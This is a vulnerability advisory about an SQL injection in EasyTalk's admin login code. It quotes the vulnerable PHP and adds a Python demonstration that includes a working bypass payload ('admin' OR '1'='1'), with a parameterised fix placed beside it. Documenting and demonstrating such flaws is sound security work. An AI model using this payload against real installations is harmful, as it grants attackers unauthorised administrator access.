### Summary:
EasyTalk SQL injection leads to admin login bypass
### Details:
The vulnerable code is in /Admin/Lib/Action/LoginAction.class.php:
```php
public function dologin() {
    parent::toadmin();
    // Raw POST values: no escaping or type checking before they reach the query
    $user_name=$_POST['username'];
    $password=$_POST['password'];
    $authcode=trim($_POST['authcode']);
    // The captcha must match the session value, so a valid captcha is still required
    if (!$user_name || !$password || !$authcode || $authcode!=$_SESSION['authcode']) {
        $this->redirect('/Login/index');
        exit;
    }
    if (ET_UC==TRUE) {
        // UCenter mode: the $username returned by uc_user_login() is interpolated unescaped
        list($uid, $username, $password, $email) = uc_user_login($user_name,$password);
        if($username && $uid>0) {
            $user = M("Users")->where("user_name='$username' AND isadmin=1")->field('user_id,user_name')->find();
            if($user) {
                Cookie::set('adminauth', authcode("$user_name\t$user[user_id]",'ENCODE'));
                echo '<script>parent.location.href="'.SITE_URL.'/admin.php?s=/Index"</script>';
            } else {
                $this->redirect('/Login/index');
            }
        } else {
            $this->redirect('/Login/index');
        }
    } else {
        // Local mode: the password is hashed first, so only $user_name carries raw input into the WHERE string
        $password=md5(md5($password));
        $user = M("Users")->where("user_name='$user_name' AND password='$password' AND isadmin=1")->find();
        if($user) {
            Cookie::set('adminauth', authcode("$user_name\t$user[user_id]",'ENCODE'));
            echo '<script>parent.location.href="'.SITE_URL.'/admin.php?s=/Index"</script>';
        } else {
            $this->redirect('/Login/index');
        }
    }
}
```
Neither the username nor the password is filtered before being concatenated into the `where()` string, so the query is injectable. In the local-login branch the password is passed through `md5(md5())` before interpolation, so in practice the `username` POST field is the one that carries the injection; the `ET_UC` branch interpolates the `$username` returned by `uc_user_login()` in the same unescaped way. Because the injected text sits before the `AND password=... AND isadmin=1` conditions, a suitable username can make the whole predicate true and defeat both the password and the `isadmin=1` check at once.
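To make the failure mode concrete, the following added example (my code, not EasyTalk's) reproduces the injectable WHERE clause from `dologin()` against an in-memory SQLite table and places the parameterised form beside it. The table layout, the sample admin row and the payload string `admin' OR '1'='1` are all constructed for illustration; the original report's request is only shown in the screenshots below and is not reproduced here.

```python
"""Added example (not EasyTalk's own code): reproduce the injectable
WHERE clause from LoginAction::dologin() against an in-memory SQLite
table, then show the parameterised form that closes the hole.

Assumptions (mine, not the page's): the users table layout, the sample
admin row and the payload string are all constructed for illustration.
"""
import hashlib
import sqlite3


def et_password_hash(password: str) -> str:
    """EasyTalk hashes the submitted password as md5(md5($password))."""
    inner = hashlib.md5(password.encode()).hexdigest()
    return hashlib.md5(inner.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one admin and one ordinary user."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, "
        "user_name TEXT, password TEXT, isadmin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (user_name, password, isadmin) VALUES (?, ?, ?)",
        [
            ("admin", et_password_hash("correct-horse"), 1),
            ("bob", et_password_hash("bobpass"), 0),
        ],
    )
    return conn


def vulnerable_find(conn, user_name: str, password: str):
    """Mirrors M("Users")->where("user_name='$user_name' AND password='$password'
    AND isadmin=1")->find(): $user_name is interpolated raw, $password is
    md5(md5()) first, so only user_name can carry SQL."""
    hashed = et_password_hash(password)
    sql = (
        "SELECT user_id, user_name FROM users WHERE "
        f"user_name='{user_name}' AND password='{hashed}' AND isadmin=1"
    )
    return conn.execute(sql).fetchone()


def hardened_find(conn, user_name: str, password: str):
    """Same lookup with bound parameters: the username is data, never SQL."""
    hashed = et_password_hash(password)
    sql = ("SELECT user_id, user_name FROM users WHERE "
           "user_name=? AND password=? AND isadmin=1")
    return conn.execute(sql, (user_name, hashed)).fetchone()


# Illustrative payload (assumed; the page's screenshot is not reproduced).
# The quote closes the literal and the OR makes the predicate true for the
# admin row regardless of the password hash and isadmin conditions that
# follow, because AND binds tighter than OR. No comment sequence is used,
# so the same string works against both MySQL and SQLite.
BYPASS_USERNAME = "admin' OR '1'='1"


def demo() -> dict:
    """Run the legitimate login, a wrong password, and the bypass against
    both the vulnerable and the hardened lookup."""
    conn = make_db()
    return {
        "legit": vulnerable_find(conn, "admin", "correct-horse"),
        "wrong_pw": vulnerable_find(conn, "admin", "nope"),
        "bypass": vulnerable_find(conn, BYPASS_USERNAME, "nope"),
        "hardened_bypass": hardened_find(conn, BYPASS_USERNAME, "nope"),
        "hardened_legit": hardened_find(conn, "admin", "correct-horse"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name}: {row}")
```

With the vulnerable lookup, `bypass` returns the admin row even though the password is wrong; with bound parameters the same payload is simply a username that does not exist and the lookup returns nothing, while the legitimate login still succeeds. In the real application the `Cookie::set('adminauth', ...)` call that follows a non-empty `$user` is what turns the returned row into an admin session.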
### Proof of concept:
On the login page, construct the following request. Note that the captcha is checked against `$_SESSION['authcode']` before the query runs, so the `authcode` field must carry the current captcha value; the injection bypasses the credential check, not the captcha:
![1.png](https://images.seebug.org/upload/201402/17115336743c778e110bf5b1fdebad1b9131a772.png)
Login succeeds:
![2.png](https://images.seebug.org/upload/201402/171154088b4b743320760263ba8bda38d563296c.png)